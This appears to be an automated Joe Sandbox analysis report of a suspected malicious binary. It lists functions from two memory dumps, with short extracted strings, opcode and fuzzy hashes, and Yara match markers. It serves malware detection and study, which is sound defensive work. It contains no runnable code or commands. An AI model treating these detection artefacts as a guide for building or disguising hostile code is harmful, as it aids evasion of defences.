Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A

Function 0214EE1A Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0214EFB7
4b, xrefs: 0214F041
D, xrefs: 0214EFCF

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: b5620f8af2725756860732dd62c17a832945ccaf40e7b1752e633ee6b85ef612
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: AD81FB6024C3818BD719CF39846137AFFD2AFD6218F28896DE4D59B381D779C506CB16

Function 0214EDC6 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0214EFB7
4b, xrefs: 0214F041
D, xrefs: 0214EFCF

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: 69a3f7301a52dac82c2f065188b0db0333776ef95477ba7d72aaad466c30f7bd
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 1B81F96024C3818BD719CF3984A137AFFD2AFD6218F28896DE4D68B381D779C506CB16

Function 00408F90 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

Z, xrefs: 004090E8
ut, xrefs: 004090E1
#=0, xrefs: 00408FC5

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756

Function 021291F7 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

Z, xrefs: 0212934F
ut, xrefs: 02129348
#=0, xrefs: 0212922C

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: 31d991d56bc1943c7a87c2e620d644cc8c2d9b1a170c2d34f2106e3b6ba8d5c0
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 8281153150C3D28AD7098F38C55076AFFE1AF93218F2899ADE4D29B682D729C51EC752

Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

4b, xrefs: 0042EDDA
8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A

Function 0214EE08 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0214EFB7
4b, xrefs: 0214F041
D, xrefs: 0214EFCF

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: 7ded4551668eb250f6d8491d844c0e4f54c357299cceea5729f59e9d49e17244
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 3181D9612483818BD719CF3984A137AFFD2AFD6218F1C496DE4D58B381D739C50ACB56

Function 00442D20 Relevance: 4.0, Strings: 3, Instructions: 282COMMON

Download Yara Rule

Strings

NMNO, xrefs: 00442E20
D`a&, xrefs: 00442ED5
bX_^, xrefs: 00442D22

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: InitializeThunk
String ID: D`a&$NMNO$bX_^
API String ID: 2994545307-620122162
Opcode ID: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
Opcode Fuzzy Hash: d05b069c2774e5dca8c6c82d0cc5445501065ceaccfd0e13c7886a15adc59c0e
Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759

Function 00414C20 Relevance: 3.5, Strings: 2, Instructions: 989COMMON

Download Yara Rule

Strings

NP,?, xrefs: 00415070
UA, xrefs: 004155D4

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: NP,?$UA
API String ID: 0-2573221895
Opcode ID: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
Opcode Fuzzy Hash: 813f516fed63c72ca3bf17ef7764154db6e20e3e50629bbb0b438f72444d9df9
Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789

Function 0042B170 Relevance: 2.9, Strings: 2, Instructions: 428COMMON

Download Yara Rule

Strings

{wBy, xrefs: 0042B538
?;;, xrefs: 0042B3AA

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: {wBy$?;;
API String ID: 0-3800777323
Opcode ID: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
Opcode Fuzzy Hash: 0391eef4f66e27ec324ee0bdb208b3ba8a61a3bb00443cccaa8d3f35c85cd4d0
Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A

Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

yr, xrefs: 004275CE
o~, xrefs: 004275E6

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786

Function 021476F7 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

o~, xrefs: 0214784D
yr, xrefs: 02147835

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction ID: 1ba8a1b81ad38b343b82a69f3628b215476f404119076f04582a037d34f2a22f
Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction Fuzzy Hash: FA9126769483508BD320DF19C854A6BFBE6EFC5324F09892CE9D94B391EBB4C506C786

Function 02162F87 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

NMNO, xrefs: 02163087
D`a&, xrefs: 0216313C

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: D`a&$NMNO
API String ID: 0-4143563191
Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction ID: 57dc3f1196348c52044b189593bb58b7f4aa455a6c839e435ca7b4298413ebce
Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction Fuzzy Hash: FE8144316483558FD318CF28CC85A7FB7A2EFC5728F29C66CE9A54B391DB3298098751

Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 004282F6, 004282C5
:7$%, xrefs: 00428375

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82

Function 021484E7 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 0214855D, 0214852C
:7$%, xrefs: 021485DC

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction ID: 36404616dfc14ee424628a8cb736820f4317bc1d544122531e6c1e53e7b7dfc6
Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction Fuzzy Hash: CD21B3715183908BD7089F79C964B6FFBE5BB86318F145A2CE1E68B291DBB4C405CB82

Function 0212AC99 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

MO, xrefs: 0212AC9E
MO, xrefs: 0212AC36

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: 50daf93f709e61a1cecbbbb2f98b1e07ab747d71c7022166047951bfce2e1866
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: 0D11AC745442918BEF148FA8DE91667BFA0EF42220F14A9D8DC855F38BC738C511CF64

Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

7&'$, xrefs: 00440445
vA\, xrefs: 0044049C

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C

Function 02160694 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 02160703
7&'$, xrefs: 021606AC

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: fb05b8305008f98ed1d8ccc20b12992bebd9305fb2b0a45d38c0d574912b04d9
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 1EF068345545944BDB918F3D98996BE67F0F757214F202AB5C65AE32A2C731C4918F08

Function 02137AE4 Relevance: 1.8, APIs: 1, Instructions: 334COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02137E61

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction ID: b03c857927eaad4e2c9809d5a352e51ae5443a78d16b7ce7d209be7bf4a06437
Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction Fuzzy Hash: C7B1F3B29487218BC314CF28C8917AAF7F2FFD9314F19962CE4C55B294E7349902C795

Function 00422380 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 004223AC

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
Opcode Fuzzy Hash: 303de10fff242c4ff705677ea5eca08dca5e362961479335f7d5ab6b711b2e43
Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A

Function 021425E7 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 02142613

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: :;
API String ID: 0-3581617570
Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction ID: 951eda92bf627b2cf52d53495b131f3d4d192f1d03141fe009ad59a9259afd0e
Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction Fuzzy Hash: FBA1E371A853119BD7109F24CC82B6BB3E1EF81324F09856CFC998B281E775ED85C762

Function 0043C5A0 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043C7C0

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
Opcode Fuzzy Hash: 4292c81706fc5104aea80fe8ef179a1662a25d3dca60aede90bca8e2f2b4382c
Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799

Function 0215C807 Relevance: 1.6, Strings: 1, Instructions: 385COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0215CA27

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: NP,?
API String ID: 0-3110377521
Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction ID: 30c4e537f8166f3c69979de2f58547caf19552f60e0355347b5632ce4f66359d
Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction Fuzzy Hash: D7A12576A84730DBD724CF28C881B3BB7A6EBC5728F19866DE8B557290D7319801CBD1

Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0041C360, 0041C364

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A

Function 0213C148 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0213C5C7, 0213C5CB

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction ID: 8d9e3d51b52352f67a1c3a6756e4c62745d2a6de53d8f10a1abb3d92b996ef27
Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction Fuzzy Hash: 5F9121B26583108BC3148F28C89166BBBE2EFC1364F18D92DE8D69B790E774C505C796

Function 00416ED0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

*+, xrefs: 00417069

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A

Function 0040DFE2 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0040E295

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: UXY^
API String ID: 0-1486013802
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95

Function 0212E249 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 0212E4FC

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: UXY^
API String ID: 0-1486013802
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: 2a9a8e0c5809833f697af48f8474b09335b7864009f30cfe7d23c896b12c9094
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: 289122B5604B818FD3158F29C990662FBA2FF96300B19869CD0D68FB16C739F816CF95

Function 00442470 Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 00442490

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID: InitializeThunk
String ID: _\]R
API String ID: 2994545307-1576797437
Opcode ID: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
Opcode Fuzzy Hash: 40b2a5fcce8fbd99e35ebddbeea2a32485a095c58c85b1bcf33869944168392c
Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A

Function 021626D7 Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 021626F7

Memory Dump Source

Source File: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Offset: 02120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2120000_89AC.jbxd

Yara matches

Similarity

API ID:
String ID: _\]R
API String ID: 0-1576797437
Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction ID: b8525d205e15b632faa991b8aad746bb2211c1f1f9d8b821d3db9c92f478b4e9
Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction Fuzzy Hash: 659126316483528BC718DF28C854A7FB7E2EFD9324F19896CE8D59B291E7319821C786

Function 004427B0 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

=^"\, xrefs: 004428B7

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: =^"\
API String ID: 0-2152245029
Opcode ID: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
Opcode Fuzzy Hash: 30c79af13426789e40e09411e713427a5fad7c453bf973c8dd38d9b25f6a572f
Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A

Function 0042D830 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042DA2E

Memory Dump Source

Source File: 00000007.00000002.1601259015.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1601259015.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_89AC.jbxd

Similarity

API ID:
String ID: "
